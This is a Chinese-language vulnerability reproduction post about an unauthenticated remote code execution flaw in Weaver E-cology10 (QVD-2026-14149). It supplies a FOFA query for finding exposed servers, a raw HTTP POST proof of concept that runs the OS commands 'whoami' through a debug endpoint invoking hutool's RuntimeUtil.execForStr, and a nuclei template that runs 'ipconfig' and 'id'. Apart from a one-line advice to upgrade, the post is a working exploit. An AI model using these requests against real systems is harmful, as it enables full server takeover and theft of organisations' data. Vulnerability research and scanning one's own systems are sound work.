泛微E-cology10存在远程代码执行漏洞复现

漏洞简介：

泛微E-cology10是一款面向中大型组织的数智化协同运营平台，定位为企业级数字化中枢，核心覆盖协同办公、流程管理、业务集成、知识管理、低代码开发等全场景能力。泛微E-cology10存在远程代码执行漏洞，攻击者无需认证，可通过向特定接口发送恶意请求，在目标服务器上执行任意代码，完全控制服务器，导致敏感数据泄露或系统沦陷。

fofa语句

icon_hash="-1619753057"

漏洞复现

POC:

POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
timeZoneOffset: -480
langType: zh_CN
Content-Length: 12
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

[["whoami"]]

nuclei：

id: fanwei-E-cology10-QVD-2026-14149

info:
  name: 泛微E-cology10 存在远程代码执行漏洞（QVD-2026-14149）
  author: AYAQ
  severity: critical
  description: |
    泛微E-cology10 存在远程代码执行漏洞（QVD-2026-14149）
    fofa:icon_hash="-1619753057"
  tags: E-cology10,fanwei

http:
  - raw:
      - |
        POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/601.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/601.1.15

        [["ipconfig"]]

      - |
        POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/601.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/601.1.15

        [["id"]]

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Windows IP")'
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
      - type: status
        status:
          - 200

Burpsuit：

修复建议

升级至最新安全版本